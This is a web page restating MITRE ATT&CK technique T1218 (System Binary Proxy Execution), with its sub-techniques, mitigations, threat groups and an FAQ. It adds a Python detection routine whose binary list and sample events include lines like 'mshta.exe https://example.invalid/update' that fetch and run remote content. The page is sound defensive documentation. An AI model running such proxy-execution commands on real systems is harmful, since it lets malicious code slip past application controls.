Description
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft-signed binaries that are present by default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
Platforms
Sub-Techniques (14)
- T1218.001 Compiled HTML File
- T1218.002 Control Panel
- T1218.003 CMSTP
- T1218.004 InstallUtil
- T1218.005 Mshta
- T1218.007 Msiexec
- T1218.008 Odbcconf
- T1218.009 Regsvcs/Regasm
- T1218.010 Regsvr32
- T1218.011 Rundll32
- T1218.012 Verclsid
- T1218.013 Mavinject
- T1218.014 MMC
- T1218.015 Electron Applications
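Added example, not code from the ATT&CK page or the LOLBAS project: a small triage routine that scores constructed Sysmon-style process-creation events by whether the image is one of the binaries behind the sub-techniques listed above, whether its command line references remote content, whether it was launched by a user application, and whether it runs from outside the Windows system directories. The parent-process list, weights, threshold and sample records are assumptions to tune per environment.

```python
import json
from pathlib import PureWindowsPath

# Proxy binaries behind the T1218 sub-techniques above (hh.exe = Compiled HTML File, control.exe = Control Panel; Electron Applications has no single binary and is omitted).
T1218_BINARIES = {
    "hh.exe", "control.exe", "cmstp.exe", "installutil.exe", "mshta.exe", "msiexec.exe",
    "odbcconf.exe", "regsvcs.exe", "regasm.exe", "regsvr32.exe", "rundll32.exe",
    "verclsid.exe", "mavinject.exe", "mmc.exe",
}
# Assumption: these parents rarely launch a proxy binary during legitimate use.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "chrome.exe", "msedge.exe", "firefox.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def basename(path):
    return PureWindowsPath(path).name.lower()

def score_event(event):
    """Weight the suspicious signals of one process-creation event; 0 means not a T1218 binary."""
    image = event.get("Image", "")
    name = basename(image)
    if name not in T1218_BINARIES:
        return 0, []
    cmd = event.get("CommandLine", "").lower()
    parent = basename(event.get("ParentImage", ""))
    checks = [  # (weight, reason, fired?)
        (1, f"{name} is a T1218 proxy binary", True),
        (2, "command line references remote content", "http://" in cmd or "https://" in cmd),
        (2, f"spawned by user application {parent}", parent in USER_APP_PARENTS),
        (1, "image outside the Windows system directories", not image.lower().startswith(SYSTEM_DIRS)),
    ]
    score = sum(weight for weight, _, fired in checks if fired)
    reasons = [reason for _, reason, fired in checks if fired]
    return score, reasons

def triage(json_lines, threshold=3):
    # Return (ProcessId, score, reasons) for each event scoring at or above the threshold.
    alerts = []
    for line in json_lines:
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append((event["ProcessId"], score, reasons))
    return alerts

# Constructed Sysmon-style Event ID 1 records for the demo (not real telemetry).
SAMPLE_EVENTS = [
    r'{"ProcessId": 4120, "Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL", "ParentImage": "C:\\Windows\\explorer.exe"}',
    r'{"ProcessId": 5233, "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe https://example.invalid/update", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}',
    r'{"ProcessId": 6018, "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec.exe /i https://example.invalid/installer.msi", "ParentImage": "C:\\Windows\\explorer.exe"}',
]
```

Running `triage(SAMPLE_EVENTS)` flags the mshta and msiexec records while the rundll32 Control Panel launch scores too low to alert; the reasons list is what an analyst would see in the alert.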
Mitigations (6)
- M1050 Exploit Protection: Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using trusted binaries to bypass application control.
- M1037 Filter Network Traffic: Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
- M1026 Privileged Account Management: Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use them, to lessen the opportunities for malicious usage.
- M1038 Execution Prevention: Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.
- M1042 Disable or Remove Feature or Program: Many native binaries may not be necessary within a given environment.
- M1021 Restrict Web-Based Content: Restrict use of certain websites, block downloads/attachments, block JavaScript, restrict browser extensions, etc.
Threat Groups (2)
| ID | Group | Context |
|---|---|---|
| G0032 | Lazarus Group | [Lazarus Group](https://attack.mitre.org/groups/G0032) lnk files used for persistence have abused the Windows Update Client (<code>wuauclt.exe</code>)... |
| G1017 | Volt Typhoon | [Volt Typhoon](https://attack.mitre.org/groups/G1017) has used native tools and processes including living off the land binaries or "LOLBins" to main... |
References
- GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.
- Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.
- Torbjorn Granlund, Richard M. Stallman. (2020, March). split(1) — Linux manual page. Retrieved March 25, 2022.
Frequently Asked Questions
What is T1218 (System Binary Proxy Execution)?
T1218 is a MITRE ATT&CK technique named 'System Binary Proxy Execution'. It belongs to the Stealth tactic(s). Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microso...
How can T1218 be detected?
Detection of T1218 (System Binary Proxy Execution) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218?
There are 6 documented mitigations for T1218. Key mitigations include: Exploit Protection, Filter Network Traffic, Privileged Account Management, Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218?
Known threat groups using T1218 include: Lazarus Group, Volt Typhoon.